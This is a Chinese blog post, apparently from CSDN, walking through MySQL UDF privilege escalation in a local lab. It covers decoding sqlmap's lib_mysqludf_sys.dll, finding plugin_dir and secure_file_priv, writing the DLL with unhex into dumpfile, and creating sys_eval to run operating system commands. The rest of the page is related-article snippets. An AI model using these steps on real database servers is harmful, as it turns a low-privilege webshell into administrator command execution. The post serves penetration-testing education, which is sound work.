udf注入

最新推荐文章于 2024-09-14 17:11:54 发布
最新推荐文章于 2024-09-14 17:11:54 发布
阅读量515 收藏 7
点赞数 10
文章标签: adb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/byname1/article/details/136767619
版权

参考文章:gylq师傅的文章,这是很详细的一篇文章,推荐大家看看,本文是更多的是概括该文内容并加以自己的理解,所以很多重复之处就直接引用文章内容了。
利用MySQL UDF进行的一次渗透测试 - FreeBuf网络安全行业门户

基础知识

前置知识

udf--user defined function,用户自定义函数。
关联语法:

CREATE [AGGREGATE] FUNCTION [IF NOT EXISTS] function_name
    RETURNS {STRING|INTEGER|REAL|DECIMAL}
    SONAME shared_library_name

其中soname指shared_library_name,也就是存放用户自定义函数的文件,windows下为.dll文件,linux下为.so文件。

该文件需要上传至mysql的检索目录下:

  • mysql<5.0 : 任意路径
  • 5.0<=mysql<5.1 : 需要导出至目标服务器的系统目录(如:c:/windows/system32/)
  • mysql>=5.1 : MySQL安装目录下的lib\plugin文件夹下

利用细节

为什么要用到udf注入?

引用:
在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell权限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场了;由于windows安装的mysql进程一般都拥有管理员权限,这就意味着用户自定义的函数也拥有管理员权限,我们也就拥有了执行管理员命令的权限,这时新建管理员用户等操作也就轻而易举了,大多数人称为这一操作为udf提权,其实表达不够准确,应该称为通过mysql获得管理员权限。

udf文件在哪里得到?

sqlmap中有现成的udf文件,
以我的为例:
sqlmap\data\udf\mysql\windows\64。
但是sqlmap中自带的shell以及一些二进制文件,为了防止误杀都经过异或编码,不能直接使用
可以利用sqlmap 自带的解码工具cloak.py,在sqlmap\extra\cloak中打开命令行,来对lib_mysqludf_sys.dll_进行解码在,然后在直接利用,输入下面的
cloak.py -d -i C:\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_
就会得到一个lib_mysqludf_sys.dll,能够直接使用。
该dll文件提供的函数:
sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
sys_set,创建或修改一个环境变量。

一些信息搜集相关sql语句

select version()
select @@basedir  #查看sql安装路径
show variables like "secure_file_priv"; #能读入或写入文件的路径
select @@plugin_dir #查看plugin_dir路径

如何上传该文件?

通过webshell上传文件或通过编码字符上传后再解码回去。
这里讲16进制字符上传:(同理base64那些当然也可以)

先把该文件16进制字符串导出:

用脚本:

file=open('E:/lib_mysqludf_sys.dll', 'rb')
content=file.read()
hex_content=content.hex()
file1=open("E:/a.txt","w")
file1.write(hex_content)

或用mysql语句
select hex(load_file("E:/lib_mysqludf_sys.dll")) into dumpfile "E:/1.txt"
但是后者需要在mysql的配置文件my.ini的mysqld模块下设置安全路径(能够读取文件,上传文件的目录)

任意路径:secure_file_priv=
指定路径:secure_file_priv=/c/example
禁止导入或导出:secure_file_priv=NULL

设置后重启即可。

上传16进制

见本地实验

本地实验

phpstudy搭建,mysql版本8.x.x。
select unhex("") into dumpfile "plugin路径/udf.dll"
unhex里面填得到的16进制字符串
然后create function sys_eval returns string soname 'udf.dll'
最后执行试试:


成功回显。
注意:这里一定要into dumpfile 而非into outfile,前者是以二进制格式写入,后者是以文本格式写入。

byname1
关注
【SQL注入UDF提权命令执行
孤桜懶契
08-15 4248
一、什么是udf udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++编写 二、udf在渗透中的作用 在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell权限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场
lunix入侵别人电脑_记录一次Linux的实战入侵过程
weixin_34207964的博客
12-24 1348
注:本人是个菜鸟。一、利用文件上传漏洞获取webshell。确定要攻击的目标网站。图上的目标站域名过期了,只能通过ip地址访问。大概在去年的时候,对目标站实施了入侵,具体如下:本想着通过sql注入的方式方式爆出用户密码,通过sqlmap扫描注入发现没有注入点,但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。...
sql注入常见方法及udf提权
whojoe的博客
04-12 3493
sql注入简单总结sql注入总结1.联合注入2.报错注入3.盲注3.1布尔盲注3.2时间盲注4.order by注入5.limit注入5.1不存在order by5.2存在order by6.insert/update注入7.宽字节注入8.二次注入9.堆叠注入10.sql注入后osshell使用11.sql注入后文件写入11.1要求11.2读11.3写11.4扩展12.sqlmap常用语法13.s...
linux下 udf提权_记一次UDF提权
weixin_42386819的博客
02-26 195
为了要拿一个服务器上的源码,目标主要是伪静态的。程序是maxcms。木有漏洞。于是就只能c段了。在c段搞了一个shell。过程就不说了。简单看了下支持php,不支持aspx。组件也删除了。整个盘都翻来覆去的,没什么直接可用的,就试了下网站的上级目录,既然可以跨。既然支持 php,就扫了下端口,开了3389、3306很好,翻到了一个php的站,在配置里看到了root密码,又继续翻到多个php站点,m...
【漏洞复现】Mysql UDF提权
cj_Hydra's Blog
11-27 1989
前言: UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。 那么我们该如何使用UDF文件呢? 默认的
UDF
ThreeAspects的博客
12-08 661
UDF定义   UDF函数用户自定义函数,在查询执行过程就是在Hive转换成MapReduce程序后,执行java方法,类似于像MapReduce执行过程中加入一个插件,方便扩展。Hive中有3种UDFUDF:操作单个数据行,产生单个数据行 UDAF:操作多个数据行,产生一个数据行 UDTF:操作一个数据行,产生多个数据行一个表作为输出 如何构建UDF 用户构建的UDF使用过程如下: 继...
UDF实用小程序_udf_质量源项_质量源udf_UDFfluent_udf源项_
09-29
例如,如果你正在模拟一个注入物质的过程,UDF可以帮助你在特定区域增加质量流量,以反映该过程。质量流量的计算通常涉及到速度、密度和截面积等参数。 "移动边界层"则涉及到流体与固体界面的问题。在实际工程中,...
UDF 源项,udf源项编程问题,C,C++
09-11
具体来说,这个UDF的目的是模拟一个在x坐标从0.8到0.9之间的一条狭窄区域内加热的源,这个源项可能代表加热元件或者热流体注入。这通常涉及到以下几个关键步骤: 1. **定义源项函数**:在C或C++中,我们需要编写一...
udf-5-6.rar_fluent udf_udf
09-22
2. **时间依赖性功能**:介绍如何利用UDF处理时间相关的物理过程,如脉冲注入或周期性边界条件。 3. **多区域和多相流**:讲解在不同流体区域间交互的UDF编写,以及多相流中的界面捕获和相互作用。 4. **后处理**:...
define_能量源项_动量udf_udf_激光焊接Fluent_激光焊接
09-11
在激光焊接过程中,激光束作为能量源,将能量注入材料,导致材料快速升温并可能熔化。编写UDF来定义能量源项,就是将激光功率转化为局部热源的过程。UDF可以考虑激光束的聚焦特性、功率密度分布以及与材料相互作用的...
sql注入学习(包括sqlilabs安装搭建注入环境步骤以及sqlmap安装操作说明链接地址)
莉莉安的博客
02-04 1万+
SQL注入: 就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。 它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。 SQL注入可以分为平台层注入和代码注入。前者是由不安全的数据库配置或平台漏洞所致。后者是程序员对输入未进行细致过滤产生 sqlilabs搭建注入环境: Sqli-labs是...
MySQL 利用UDF执行命令
1ame的博客
09-02 1万+
UDF即User-Defined Functions lib_mysqludf_sys 在github的介绍: A UDF library with functions to interact with the operating system. These functions allow you to interact with the execution environment
EDGE浏览器打开网页缓慢解决
热门推荐
whojoe的博客
11-19 3万+
EDGE浏览器打开网页缓慢解决前言解决办法 前言 不清楚是不去路由器前面做了多wan负载均衡问题,edge打开网页很慢,换了火狐发现正常,于是从edge浏览器内部找问题 解决办法 edge://settings/privacy 把目录的两个配置反选即可 ...
centos7安装MySQL5.7.44
weiqiang915的博客
09-12 539
出现root默认密码说明安装成功。
P2865 [USACO06NOV] Roadblocks G
最新发布
summ1ts的博客
09-14 251
则我们分别考虑如何更新最短路和次短路,在就是本题求的是严格次短路,注意判断条件。,那时博客上写的是枚举删除最短路上的边,然后求解。不过这种做法最坏时间复杂度可以有。,对于这道题数据范围较大,所以可以用更好写,思维难度也不高的方法来解决。在刚学最短路时,我做过这道题。
Navicat On-Prem Server 2.0 | MySQL与MariaDB基础管理功能正式上云
Navicat 官方账号
09-11 1062
近日,Navicat 发布了 Navicat On-Prem Server 2.0 的重大版本更新。这标志着这款自2021年首发的私有云团队协作解决方案迈入了一个崭新的阶段。此次2.0版本的飞跃性升级,核心聚焦于MySQL与MariaDB基础管理功能的全面革新与强化,赋予了用户的操作灵活性与高效性,进一步助力团队在私有云环境下实现无缝协同作业。
安卓玩机工具-----ADB与 FASTBOOT模式 图形化 多功能玩机刷机工具
mg668的博客
09-11 1052
这款工具是英文版。易于使用的工具提供了用于运行 ADB 和 Fastboot 命令的图形用户界面。ADB 功能包括旁加载、安装和卸载应用程序、测试设备以及重新启动到不同的模式。可以使用 fastboot 命令进行设备管理;其中包括检查 Antirollback 和 active slots 等变量以及解锁 bootloader。该工具还提供了各种基于 Fastboot 的系统文件刷写选项。它还有一个用于跟踪命令输出的日志部分和一个用于手动操作的终端。尽管大多数功能已经过测试并且可靠,但用户应仔细查看日志,尤
在云服务器上安装配置 MySQL 并开启远程访问(详细教程)
吃面不喝汤的博客
09-11 1043
MySQL 是最流行的开源关系数据库之一,常用于开发与生产环境中。本文将详细介绍如何在云服务器(如阿里云)上安装 MySQL,并配置允许从远程主机(如本地电脑)进行访问。通过以上步骤,您已经成功在云服务器上安装并配置 MySQL,并允许从本地进行远程访问。关键步骤包括启动 MySQL 服务、修改绑定地址、授予远程用户权限,以及确保防火墙和安全组正确配置。此外,运行来提升安全性,确保数据库运行在安全的环境中。
【开发环境搭建】Macbook M1搭建Java开发环境
weixin_44329069的博客
09-10 1437
配置环境变量:打开终端,使用vim编辑在文件中添加以下内容来设置JAVA_HOME保存并退出:按esc键,然后输入:wq!。
SQLmap命令详解:利用udf提权与MSSQL获取shell
"本文主要介绍了如何使用SQLmap工具进行SQL注入攻击,并获取Webshell和系统权限。文中列举了SQLmap的一些关键命令,包括检查DBA权限、启动数据库shell、执行操作系统命令、读写文件以及尝试权限提升等。此外,还提到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值